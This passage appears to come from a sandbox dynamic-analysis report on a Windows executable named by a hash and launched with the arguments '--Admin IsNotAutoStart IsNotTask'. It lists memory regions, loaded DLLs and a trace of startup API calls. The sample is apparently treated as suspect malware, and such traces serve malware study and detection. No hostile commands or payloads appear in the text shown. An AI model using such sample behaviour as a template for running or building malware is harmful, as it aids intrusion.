end_va = 0x2ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 1156 start_va = 0x2f20000 end_va = 0x2f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 1157 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1158 start_va = 0x754c0000 end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1159 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1160 start_va = 0x71da0000 end_va = 0x71e1cfff monitored = 0 entry_point = 0x71da166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1161 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1162 start_va = 0x2660000 end_va = 0x2666fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1163 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1164 start_va = 0x2660000 end_va = 0x2666fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1165 start_va = 0x737b0000 end_va = 0x737defff monitored = 0 entry_point = 0x737b1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1166 start_va = 0x27c0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1167 start_va = 0x2f60000 end_va = 0x915ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 1168 start_va = 0x71e40000 end_va = 0x71e51fff monitored = 0 entry_point = 0x71e43271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1169 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1170 start_va = 0x2800000 end_va = 0x2810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1171 start_va = 0x739f0000 end_va = 0x73a02fff monitored = 0 entry_point = 0x739f1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1172 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 1173 start_va = 0x2830000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1174 start_va = 0x28a0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 1175 start_va = 0x28e0000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1176 start_va = 0x9160000 end_va = 0x925ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009160000" filename = "" Region: id = 1177 start_va = 0x9260000 end_va = 0x935ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009260000" filename = "" Region: id = 1178 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1179 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1180 start_va = 0x74920000 end_va = 0x74927fff monitored = 0 entry_point = 0x74921356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 1181 start_va = 0x73350000 end_va = 0x73378fff monitored = 0 entry_point = 0x73356b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1182 start_va = 0x71e00000 end_va = 0x71e13fff monitored = 0 entry_point = 0x71e015c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 1183 start_va = 0x71de0000 end_va = 0x71df6fff monitored = 0 entry_point = 0x71de1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 1184 start_va = 0x71dd0000 end_va = 0x71dd7fff monitored = 0 entry_point = 0x71dd3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 1185 start_va = 0x71dc0000 end_va = 0x71dcefff monitored = 0 entry_point = 0x71dc12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1186 start_va = 0x71db0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71db1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 1187 start_va = 0x71da0000 end_va = 0x71da8fff monitored = 0 entry_point = 0x71da15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1188 start_va = 0x71d90000 end_va = 0x71d9cfff monitored = 0 entry_point = 0x71d912d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 1326 start_va = 0x9360000 end_va = 0x955ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009360000" filename = "" Region: id = 1327 start_va = 0x9560000 end_va = 0x9e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1328 start_va = 0x2920000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Thread: id = 67 os_tid = 0xf30 [0096.561] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x961f1080, dwHighDateTime=0x1d8a8b9)) [0096.562] GetCurrentThreadId () returned 0xf30 [0096.562] GetCurrentProcessId () returned 0xf2c [0096.562] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1522176271774) returned 1 [0096.592] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0096.630] GetProcessHeap () returned 0x5f0000 [0096.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0096.756] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0096.756] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0096.756] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0096.757] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0096.758] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0096.759] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0096.760] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0096.760] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0096.760] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0096.760] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0096.760] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0096.761] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3bc) returned 0x60f228 [0096.761] GetCurrentThreadId () returned 0xf30 [0096.789] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x601a00 [0096.789] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x800) returned 0x60f5f0 [0096.789] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xff011c65, hStdError=0x0)) [0096.789] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0096.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0096.790] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0096.790] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" [0096.790] GetEnvironmentStringsW () returned 0x60fdf8* [0096.790] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0e) returned 0x610910 [0096.816] FreeEnvironmentStringsW (penv=0x60fdf8) returned 1 [0096.845] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x116) returned 0x60fdf8 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x98) returned 0x60ff18 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3e) returned 0x602448 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x56) returned 0x60ffb8 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x6e) returned 0x610018 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x78) returned 0x5ffb98 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x62) returned 0x610090 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x30) returned 0x60b2d8 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x48) returned 0x606df0 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x28) returned 0x60acd0 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1a) returned 0x60eae0 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x34) returned 0x601a20 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x5c) returned 0x610100 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x32) returned 0x610168 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x60b310 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1c) returned 0x60eb08 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12a) returned 0x6101a8 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x7c) returned 0x6102e0 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x36) returned 0x610368 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3a) returned 0x602490 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x90) returned 0x6103a8 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x24) returned 0x60ad00 [0096.845] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x30) returned 0x60b348 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x36) returned 0x610440 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x48) returned 0x606e40 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x52) returned 0x610480 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3c) returned 0x6024d8 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xd6) returned 0x6104e0 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2e) returned 0x60b380 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1e) returned 0x60eb30 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2c) returned 0x60b3b8 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x54) returned 0x6105c0 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x52) returned 0x610620 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2c) returned 0x60b3f0 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x26) returned 0x60ad30 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3e) returned 0x602520 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x24) returned 0x60ad60 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x30) returned 0x60b428 [0096.846] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x8c) returned 0x610680 [0096.847] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x610910 | out: hHeap=0x5f0000) returned 1 [0096.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x800) returned 0x610718 [0096.959] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x80) returned 0x610f20 [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] GetACP () returned 0x4e4 [0096.960] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x220) returned 0x610fa8 [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] IsValidCodePage (CodePage=0x4e4) returned 1 [0096.960] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0096.993] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0097.006] GetLastError () returned 0x0 [0097.006] SetLastError (dwErrCode=0x0) [0097.006] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.017] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0097.017] GetLastError () returned 0x0 [0097.017] SetLastError (dwErrCode=0x0) [0097.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.028] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0097.028] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0097.028] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõ\x1d\x01ÿäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0097.028] GetLastError () returned 0x0 [0097.028] SetLastError (dwErrCode=0x0) [0097.028] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.028] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" 